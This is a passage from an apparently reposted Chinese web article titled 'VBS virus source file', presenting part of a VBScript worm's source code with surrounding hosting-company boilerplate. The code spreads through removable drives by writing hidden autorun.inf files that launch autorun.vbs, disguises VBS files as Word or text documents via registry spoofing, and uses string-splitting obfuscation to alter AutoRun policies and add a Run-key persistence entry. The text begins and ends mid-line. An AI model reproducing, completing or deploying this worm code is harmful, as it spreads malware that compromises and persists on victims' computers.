vbs病毒源文件

作者佚名来源 ASP编程浏览发布时间 2013-07-09

hr(34)&chr(64)&"C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)
ts.close
Setf=fs.GetFile(fs.GetSpecialFolder(1)&"\doc.reg")
f.attributes=f.attributes+7
else
Setts=fs.CreateTextFile(w.DriveLetter&":\vbs.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLinechr(34)&chr(64)&"C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34)&"="&chr(34)&"文本文件"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":\vbs.reg")
f.attributes=f.attributes+7
Setts=fs.CreateTextFile(w.DriveLetter&":\doc.reg",true)
ts.WriteLine"WindowsRegistryEditorVersion5.00"
ts.WriteLine"[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]"
ts.WriteLinechr(34)&chr(64)&"C:\\WINDOWS\\System32\\wshext.dll,-4802"&chr(34)&"="&chr(34)&"MicrosoftWord文档"&chr(34)
ts.close
Setf=fs.GetFile(w.DriveLetter&":\doc.reg")
f.attributes=f.attributes+7
endif
endif
endif
Iffs.FileExists(w.DriveLetter&":\autorun.inf")Then
Setc=fs.opentextfile(w.DriveLetter&":\autorun.inf",1)
vbc=c.readall
IfInStr(vbc,"WScript.exe.\autorun.vbs")<>0Then
c.Close
Else
Setf=fs.GetFile(w.DriveLetter&":\autorun.inf")
f.attributes=f.attributes-f.attributes
Setts=f.OpenAsTextStream(2,-2)
ts.WriteLine"[AutoRun]"
ts.WriteLine"open="
ts.WriteLine""
ts.WriteLine"shell\open=打开(&O)"
ts.WriteLine"shell\open\Command=WScript.exe.\autorun.vbs"
ts.WriteLine"shell\open\Default=1"
ts.close
f.attributes=f.attributes+7
endif
else
Setts=fs.CreateTextFile(w.DriveLetter&":\autorun.inf",true)
ts.WriteLine"[AutoRun]"
ts.WriteLine"open="
ts.WriteLine""
ts.WriteLine"shell\open=打开(&O)"
ts.WriteLine"shell\open\Command=WScript.exe.\autorun.vbs"
ts.WriteLine"shell\open\Default=1"
ts.close
Setf=fs.GetFile(w.DriveLetter&":\autorun.inf")
f.attributes=f.attributes+7
EndIf
endif
endFunction
Functionregwrite()
OnErrorResumeNext
dims
a1="HKE"&"Y_CUR"&"RENT_US"&"ER\Soft"&"ware\Mi"&"croso"&"ft\Win"&"dows\Cur"&"rentV"&"ersion\Exp"&"lorer\Ad"&"vanced\"（a1=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
a2="HK"&"EY_CLAS"&"SES_RO"&"OT\DLL"&"File\"（a2=HKEY_CLASSES_ROOT\DLLFile）
a3="HKEY"&"_LOCA"&"L_MACH"&"INE\SOFT"&"WARE\Mi"&"cros"&"oft\Win"&"dows\Cur"&"rentVer"&"sion\poli"&"cies\Expl"&"orer\NoDr"&"iveTypeAutoRun"
（a3=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun）
a4="HKE"&"Y_CURR"&"ENT_USE"&"R\Softw"&"are\Micr"&"osoft\Wi"&"ndows\Cur"&"rentVersi"&"on\Polici"&"es\Explor"&"er\NoDriveT"&"ypeAutoRun"
（a4=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun）
a5="HK"&"EY_LO"&"CAL_MA"&"CHINE\Sof"&"tware\Mi"&"croso"&"ft\Wind"&"ows\Curre"&"ntVersi"&"on\Ru"&"n\USBDR"&"IVE.dll"
(a5=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\USBDRIVE.dll)
a6="R.Re"&"gWri"&chr(116)&"e"(a6=R.RegWrichr(116)e)
a7="HKE"&"Y_CLAS"&"SES_ROO"&"T\VBSF"&"ile\Defau"&"ltIcon\"
(a7=HKEY_CLASSES_ROOT\VBSF

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务，公司网站：http://www.lingzhong.cn 为了给广大客户了解更多的技术信息，本技术文章收集来源于网络,凌众科技尊重文章作者的版权，如果有涉及你的版权有必要删除你的文章，请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!

上一页 1 2 3 4 5 6 7 下一页

分享到：更多

你可能对下面的文章感兴趣

上一篇: 用vbs操作注册表实例代码下一篇: 学习 WSH 的理由小结

关于vbs病毒源文件的所有评论

随机推荐